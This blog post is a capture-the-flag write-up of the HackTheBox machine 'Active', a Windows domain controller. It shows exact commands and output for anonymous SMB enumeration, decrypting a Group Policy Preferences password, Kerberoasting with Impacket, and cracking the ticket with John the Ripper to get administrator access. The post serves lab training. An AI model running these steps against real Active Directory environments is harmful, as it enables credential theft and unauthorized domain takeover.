This blogpost contains a write-up of today’s retired machine from HackTheBox - “Active”. I quite liked this one; it illustrates the concepts on how to fail your job as sysadmin quite well :). The machine is running Windows Server 2008 R2 SP1 and serving the Domain Controller (DC) role. We utilize two common attack techniques against an Active Directory (AD) environment to ultimately get administrator privileges on the machine. In summary:
| User access | Root access |
|---|---|
| SMB share allowing anonymous login | Kerberoasting |
| Exposed Groups.xml GPP file | Cracking Administrator NTLM hash |
Reconnaissance
Like always, let’s start off with an nmap scan to gain insight into the open ports and services running on our target machine.
root@kali:~/HTB/active# nmap -sC -sV -oA active.nmap 10.10.10.100
Starting Nmap 7.70 ( https://nmap.org ) at Sep 1 18:14:56 2018
Nmap scan report for 10.10.10.100
Host is up (0.037s latency).
Not shown: 983 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2018-09-01 16:09:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5m08s, deviation: 0s, median: -5m08s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2018-09-01 18:10:57
|_ start_date: 2018-08-27 05:30:14
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 1 18:18:02 2018 -- 1 IP address (1 host up) scanned in 186.06 seconds
From the output of nmap we can conclude:
- The OS of the system is Windows Server 2008 R2 SP1;
- The system is accepting SMB connections (TCP/445);
- The system is accepting both Kerberos and LDAP authentication requests;
- The system has the Active Directory role installed, most likely serving as Domain Controller - hence the abbreviation:
dc.active.htb.
SMB Enumeration
Port 445 was determined to be open; which is commonly used for SMB shares. Start the enumeration of open SMB shares on the system using smbmap:
root@kali:~/HTB/active# smbmap -H 10.10.10.102
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.100...
[+] IP: 10.10.10.100:445 Name: 10.10.10.100
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ NO ACCESS
NETLOGON NO ACCESS
Replication READ ONLY
SYSVOL NO ACCESS
Users NO ACCESS
All the shares except for Replication do not allow unauthenticated connections. The Replication shared folder has read-only permissions. Let’s connect to the open share anonymously:
root@kali:~/HTB/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \>
The login is successful! There are several directories and files to be identified during the enumeration of this folder. In the end I found a file named “Groups.xml” which I transferred to my Kali box.
root@kali:~/HTB/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
10459647 blocks of size 4096. 4945285 blocks available
smb: \> cd active.htb\
active.htb\DfsrPrivate\ active.htb\Policies\ active.htb\scripts\
smb: \> cd active.htb\Policies\{
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\ active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\ active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\
active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol
smb: \> cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
Groups.xml A 533 Wed Jul 18 22:46:06 2018
10459647 blocks of size 4096. 4945285 blocks available
The Groups.xml file seems to contain a user named “SVC_TGS” (userName) with its encrypted(?) password (cpassword).
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Group Policy Preferences
Initially I was unfamiliar with the structure or use case of this file. After some online searching, I figured out this is an XML file used to store Group Policy Preferences (GPP). Some background information:
GPP is an addition to Group Policy that allows system administrators to configure local admin accounts, mount network drives, configure scheduled tasks automatically after a user logs in. It is distributed in XML-format via the SYSVOL share hosted on domain controllers. Endpoints can then query this folder to retrieve and process the policy file. Any domain user can access this share and retrieve the contents of the GPP file. It could potentially contain local administrator credentials to be reused for lateral movement. But it gets even better; although the password (cpassword field) is encrypted with the AES algorithm, the private key has been released by Microsoft. This makes it trivial to decrypt the actual password, several tools have been developed just for this purpose.
So now we know a little bit more about the origin of the Groups.xml file, let’s try to crack the password using a utility named gpp-decrypt:
root@kali:~/HTB/active# gpp-decrypt
edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdY
w/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is
deprecated
GPPstillStandingStrong2k18
Retrieving the user.txt file
Great! We have now cracked the password of the SVC_TGS user. Let’s try to connect to the ADMIN$ directory we have identified in our SMB enumeration process earlier:
root@kali:~/HTB/active# smbclient \\\\10.10.10.100\\ADMIN$ -U active.htb/SVC_TGS
Enter ACTIVE.HTB\SVC_TGS's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
Unfortunately we do not have access to this particular shared folder. Connect to the Users folder using the same procedure.
root@kali:~/HTB/active# smbclient \\\\10.10.10.100\\Users -U active.htb/SVC_TGS
Enter ACTIVE.HTB\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \>
It worked! We can now retrieve the user.txt file that is stored in SVC_TGS desktop.
root@kali:~/HTB/active# smbclient \\\\10.10.10.100\\Users -U active.htb/SVC_TGS
Enter ACTIVE.HTB\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHS 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHS 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
10459647 blocks of size 4096. 4945269 blocks available
smb: \> cd SVC_TGS\
SVC_TGS\Contacts\ SVC_TGS\Downloads\ SVC_TGS\Links\ SVC_TGS\My Music\ SVC_TGS\My Videos\ SVC_TGS\Searches\
SVC_TGS\Desktop\ SVC_TGS\Favorites\ SVC_TGS\My Documents\ SVC_TGS\My Pictures\ SVC_TGS\Saved Games\
smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 17:14:42 2018
.. D 0 Sat Jul 21 17:14:42 2018
user.txt A 34 Sat Jul 21 17:06:25 2018
10459647 blocks of size 4096. 4945269 blocks available
Privilege Escalation
It quickly became apparent to me that the capabilities of the SVC_User on the system are very limited. I could not find anything of use in the mounted Users share. The user is not allowed remote execution with tools like PsExec or WMI and I wasn’t able to mount any of the other available shares. However the SVC_TGS username might gives us a clue. TGS stands for Ticket Granting Service.
I started searching for potential attack techniques for abusing TGS. This quickly led me to a attack known as “Kerberoasting”. In order to understand how a Kerberos attack works, you need to know the basics of Kerberos. In short:
- Users log on to an endpoint and receives a Ticket Granting Ticket (TGT) from the key distribution center (KDC).
- The
krbtgtbuilt-in account will sign the TGT and serves as the proof of identify for the user. - Using the TGT the end user can request tickets (TGS) for resources available in the domain.
Service Principal Names (SPNs) are associated to a service instance with a service logon account. The TGS is partially encrypted with the NTLM hash of the service account that is associated to the SPN.
Every domain user is capable of requesting TGS for any service that has a registered SPN in Active Directory. This will ultimately allow retrieval of the hash of the service account’s password - that can be cracked offline.
Kerberoasting
With this knowledge at hand, let’s continue with our privilege escalation process. Use the Get-UserSPN.py Python script from the Impacket collection to retrieve the SPN’s associated to user accounts.
Use the -request parameter to send a TGS request. This provides us with a ticket encrypted with the administrator NTLM hash – as it is linked with the CIFS SPN:
root@kali:~/HTB/active#./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
Password:
ServicePrincipalName: Administrator
Name: active/CIFS:445
MemberOf: CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb
PasswordLastSet: 2018-07-18 15:06:40
LastLogon: 2018-07-30 13:17:40
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$323ee379be95d259c3e649a
b59c62672$c9b511f18e334dbfe9b662cb58220608efceb6fecdddfbb1f2c1720af04786453660
67f7e9787785bd27fecaea1e429315b4f3376708119be5d78d0829d0cad37ed7d215fc5a800c5f
39bcff2dcb42aa17bb88b80a0efa0f83277914e2a8409f93c44d3753102feb5339766c13c977d0
d2cd33ab1617bc9d37290605046869b6debacab5965325c53e0ea798624ec31c7497632d3a8ec9
7f30cff599f4e5f9956032e1371e575caee4c08fc76a42ac4a2ca08a18fcf34ca8829425222b4d
c4335250929c9d9eb54826977be93cd5ee4e56aadf4aa9273c3fb155531342c33de32c37ecd0b1
1cc9159cab18a675bb2759290e9cc2684aa54e482f43d5cdfbeaa856f6c2857bc54c0b30e24aee
9c3a287e309c09ee42d8a9738cb170944102f3c5f35019061f6538caa1b8bd5856f33ea17fa3c4
f65742b2685540b8f4aa61418e6e7753f2a5ecb1eae1015483c0017b8335bbaebe6c19eef492d9
62f8af0de0524823f38dc9d6df5b64bfd6a9ac98f9903b059afd9f54cef636948624e6bafcc189
3392ad760e5ab33b68711f8480d570af077c72f94d6b84b1c812f28fcf8318b3ecad7966d521e3
c8fa55f52cb5936eb853cedbb5db4954ec13be70dfc9349acf401493b6b5e772377d3e6360cfda
e4bb16f79f857cd8052f93ab7e5d9ec03133b48b26364a20281645beb756be2e68b4c23d70bf6d
2c9a7ce251e2c403e7b0efaf519c120402b23bf796ee5877a936dd4cfba9e123a206aad5002b30
5db39ad27cc5d4f30576c6e4f07dac2c2f9f9ec92fc3b56de8a06d87dbcafc434ec822079c7377
a7d76c6a45cb0d29a7cff9c84f9cac8c7c340ec200421b2d046f63770175204ea041d7157c1ae0
5918f4ff5b065feaf54d55bc00348f55210a738b094edaccdab37c4dbde8c57eb1fe11c7567e26
a18317864577604bbcddbb8918db707461dbb58a813fb4e9bb4a81e0df5d990d2fb8a2dad87cca
3ca281088390d3ed5e673835ee3fae27f704298b8d16611c87e99f453862080d93fd6f5924cc2f
ea6d499aa0f173894f068783c90e73826d561cbaa5fb9ea3bed30655322f191dbd9c5f0388fb64
d234bd162d3a9be30a72b6e23bbc4c4724438712fb08951099c1018e8d5222a5aba114227d884f
5c73dfbf84004697aa02a56698064cd377fa4ffbae317b317c696f1787a95f02039dc7e3db5d49
eeb2b7b79f2d60a6459ce7af6eb5737f47aa06490018da44aed1d4979e681f5dddf424807c
We can then decrypt the ticket using JohnTheRipper; using the following syntax:
root@kali:~/HTB/active#./john --format=krb5tgs '~/HTB/active/ticket.txt' --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:03 DONE (2018-09-01 19:48) 0.3267g/s 3444Kp/s 3444Kc/s 3444KC/s Tiffani143.. Thehulk2008
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Wow, that was fast! We managed to crack the ticket and retrieve password of the administrator: Ticketmaster1968. Remember the list of network shares we’ve identified at the beginning? Try and connect to the C$ share and see if we can retrieve the root.txt file:
root@kali:~/HTB/active# smbclient \\\\10.10.10.100\\C$ -U active.htb/Administrator
Enter ACTIVE.HTB\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> dir
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Config.Msi DHS 0 Mon Jul 30 16:10:06 2018
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
pagefile.sys AHS 4294500352 Sun Dec 2 23:08:27 2018
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Wed Jul 18 20:44:51 2018
Program Files (x86) DR 0 Wed Jul 18 20:44:52 2018
ProgramData DH 0 Mon Jul 30 15:49:31 2018
Recovery DHS 0 Mon Jul 16 12:13:22 2018
System Volume Information DHS 0 Wed Jul 18 20:45:01 2018
Users DR 0 Sat Jul 21 16:39:20 2018
Windows D 0 Mon Jul 30 15:42:18 2018
10459647 blocks of size 4096. 4945253 blocks available
smb: \> cd Users\Administrator\Desktop\
Users\Administrator\Desktop\desktop.ini Users\Administrator\Desktop\root.txt
Success! root.txt has been claimed: b5fc76d1d6b91d77b2fbf2d54d0f708b